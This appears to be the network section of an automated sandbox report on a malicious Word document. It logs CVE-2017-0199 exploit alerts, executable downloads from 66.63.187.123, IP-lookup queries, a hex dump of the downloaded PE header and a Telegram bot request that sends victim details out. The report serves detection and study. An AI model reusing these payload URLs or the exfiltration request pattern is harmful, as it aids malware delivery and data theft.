Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80

Networking
barindex
Suricata IDS alerts for network traffic
Source: Network traffic Suricata IDS: 2024413 - Severity 1 - ET EXPLOIT CVE-2017-0199 Common Obfus Stage 2 DL : 66.63.187.123:80 -> 192.168.2.22:49163
Source: Network traffic Suricata IDS: 2022050 - Severity 1 - ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 : 66.63.187.123:80 -> 192.168.2.22:49166
Source: Network traffic Suricata IDS: 2022051 - Severity 1 - ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 : 66.63.187.123:80 -> 192.168.2.22:49166
Uses the Telegram API (likely for C&C communication)
Source: unknown DNS query: name: api.telegram.org
Yara detected Generic Downloader
Source: Yara match File source: 13.2.millitingacy20306.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.millitingacy20306.exe.33e3600.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.millitingacy20306.exe.3249300.3.raw.unpack, type: UNPACKEDPE
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.26.2Date: Fri, 27 Sep 2024 14:00:37 GMTContent-Type: application/x-msdos-programContent-Length: 673280Connection: keep-aliveLast-Modified: Fri, 27 Sep 2024 03:14:38 GMTETag: "a4600-6231141618562"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 77 22 f6 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 08 00 00 3c 0a 00 00 08 00 00 00 00 00 00 ee 5a 0a 00 00 20 00 00 00 00 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 0a 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 94 5a 0a 00 57 00 00 00 00 60 0a 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 0a 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 3a 0a 00 00 20 00 00 00 3c 0a 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 00 06 00 00 00 60 0a 00 00 06 00 00 00 3e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 80 0a 00 00 02 00 00 00 44 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 5a 0a 00 00 00 00 00 48 00 00 00 02 00 05 00 5c 1b 0a 00 38 3f 00 00 03 00 00 00 2e 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 03 30 03 00 41 00 00 00 00 00 00 00 20 70 02 00 00 8d 01 00 00 01 25 d0 39 00 00 04 28 01 00 00 0a 80 3a 00 00 04 20 56 01 00 00 8d 01 00 00 01 25 d0 46 00 00 04 28 01 00 00 0a 80 47 00 00 04 28 2f 00 00 06 2a d0 01 00 00 06 26 2a 00 00 00 1e 02 7b 01 00 00 04 2a 22 02 03 7d 01 00 00 04 2a 00 00 00 13 30 05 00 68 00 00 00 00 00 00 00 02 1f 0a 8d 0a 00 00 01 25 16 72 01 00 00 70 a2 25 17 72 01 00 00 70 a2 25 18 72 01 00 00 70 a2 25 19 72 01 00 00 70 a2 25 1a 72 01 00 00 70 a2 25 1b 72 01 00 00 70 a2 25 1c 72 01 00 00 70 a2 25 1d 72 01 00 00 70 a2 25 1e 72 01 00 00 70 a2 25 1f 09 72 01 00 00 70 a2 7d 01 00 00 04 2b 00 02 28 05 00 00 0a 00 2a 36 28 2f 00 00 06 2a d0 05 00 00 06 26 2a 00 00 13 30 03 00 cd 00 00 00 01 00 00 11 7e 47 00 00 04 13 06 2b 3e 11 05 45 0b 00 00 00 60 00 00 00 00 00 00 00 45 00 00 00 35 00 00 00 45 00 00 00 87 00 00 00 0b 00 00 00 89 00 00 00 1c 00 00 00 60 00 00 00 45 00 00 00 d0 06 00 00 06 26 1c 13 05 2b c2 16 0a
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:724471%0D%0ADate%20and%20Time:%209/27/2024%20/%2011:31:56%20PM%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20724471%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View IP Address: 66.63.187.123 66.63.187.123
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: TELEGRAMRU TELEGRAMRU
Source: Joe Sandbox View ASN Name: ASN-QUADRANET-GLOBALUS ASN-QUADRANET-GLOBALUS
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
Source: Joe Sandbox View JA3 fingerprint: 36f7277af969a6947a61ae0b815907a1
May check the online IP address of the machine
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe DNS query: name: reallyfreegeoip.org
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe DNS query: name: reallyfreegeoip.org
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe DNS query: name: reallyfreegeoip.org
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe DNS query: name: reallyfreegeoip.org
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe DNS query: name: reallyfreegeoip.org
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe DNS query: name: reallyfreegeoip.org
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe DNS query: name: reallyfreegeoip.org
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe DNS query: name: reallyfreegeoip.org
Suricata IDS alerts with low severity for network traffic
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.22:49170 -> 193.122.130.0:80
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.22:49167 -> 158.101.44.242:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.22:49169 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.22:49171 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.22:49183 -> 188.114.97.3:443
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /txt/millizxc.doc HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: 66.63.187.123Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /txt/H363BpKqz0MdVd7.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 66.63.187.123Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.22:49168 version: TLS 1.0
Source: unknown TCP traffic detected without corresponding DNS query: 66.63.187.123
Source: unknown TCP traffic detected without corresponding DNS query: 66.63.187.123
Source: unknown TCP traffic detected without corresponding DNS query: 66.63.187.123
Source: unknown TCP traffic detected without corresponding DNS query: 66.63.187.123
Source: unknown TCP traffic detected without corresponding DNS query: 66.63.187.123
Source: unknown TCP traffic detected without corresponding DNS query: 66.63.187.123
Source: unknown TCP traffic detected without corresponding DNS query: 66.63.187.123
Source: unknown TCP traffic detected without corresponding DNS query: 66.63.187.123
Source: unknown TCP traffic detected without corresponding DNS query: 66.63.187.123
Source: unknown TCP traffic detected without corresponding DNS query: 66.63.187.123
Source: unknown TCP traffic detected without corresponding DNS query: 66.63.187.123
Source: unknown TCP traffic detected without corresponding DNS query: 66.63.187.123
Source: unknown TCP traffic detected without corresponding DNS query: 66.63.187.123
Source: unknown TCP traffic detected without corresponding DNS query: 66.63.187.123
Source: unknown TCP traffic detected without corresponding DNS query: 66.63.187.123
Source: unknown TCP traffic detected without corresponding DNS query: 66.63.187.123
Source: unknown TCP traffic detected without corresponding DNS query: 66.63.187.123
Source: unknown TCP traffic detected without corresponding DNS query: 66.63.187.123
Source: unknown TCP traffic detected without corresponding DNS query: 66.63.187.123
Source: unknown TCP traffic detected without corresponding DNS query: 66.63.187.123
Source: unknown TCP traffic detected without corresponding DNS query: 66.63.187.123
Source: unknown TCP traffic detected without corresponding DNS query: 66.63.187.123
Source: unknown TCP traffic detected without corresponding DNS query: 66.63.187.123
Source: unknown TCP traffic detected without corresponding DNS query: 66.63.187.123
Source: unknown TCP traffic detected without corresponding DNS query: 66.63.187.123
Source: unknown TCP traffic detected without corresponding DNS query: 66.63.187.123
Source: unknown TCP traffic detected without corresponding DNS query: 66.63.187.123
Source: unknown TCP traffic detected without corresponding DNS query: 66.63.187.123
Source: unknown TCP traffic detected without corresponding DNS query: 66.63.187.123
Source: unknown TCP traffic detected without corresponding DNS query: 66.63.187.123
Source: unknown TCP traffic detected without corresponding DNS query: 66.63.187.123
Source: unknown TCP traffic detected without corresponding DNS query: 66.63.187.123
Source: unknown TCP traffic detected without corresponding DNS query: 66.63.187.123
Source: unknown TCP traffic detected without corresponding DNS query: 66.63.187.123
Source: unknown TCP traffic detected without corresponding DNS query: 66.63.187.123
Source: unknown TCP traffic detected without corresponding DNS query: 66.63.187.123
Source: unknown TCP traffic detected without corresponding DNS query: 66.63.187.123
Source: unknown TCP traffic detected without corresponding DNS query: 66.63.187.123
Source: unknown TCP traffic detected without corresponding DNS query: 66.63.187.123
Source: unknown TCP traffic detected without corresponding DNS query: 66.63.187.123
Source: unknown TCP traffic detected without corresponding DNS query: 66.63.187.123
Source: unknown TCP traffic detected without corresponding DNS query: 66.63.187.123
Source: unknown TCP traffic detected without corresponding DNS query: 66.63.187.123
Source: unknown TCP traffic detected without corresponding DNS query: 66.63.187.123
Source: unknown TCP traffic detected without corresponding DNS query: 66.63.187.123
Source: unknown TCP traffic detected without corresponding DNS query: 66.63.187.123
Source: unknown TCP traffic detected without corresponding DNS query: 66.63.187.123
Source: unknown TCP traffic detected without corresponding DNS query: 66.63.187.123
Source: unknown TCP traffic detected without corresponding DNS query: 66.63.187.123
Source: unknown TCP traffic detected without corresponding DNS query: 66.63.187.123
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{E869B705-8442-482B-ACFD-8A589F7F3952}.tmp Jump to behavior
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:724471%0D%0ADate%20and%20Time:%209/27/2024%20/%2011:31:56%20PM%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20724471%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /txt/millizxc.doc HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: 66.63.187.123Connection: Keep-Alive
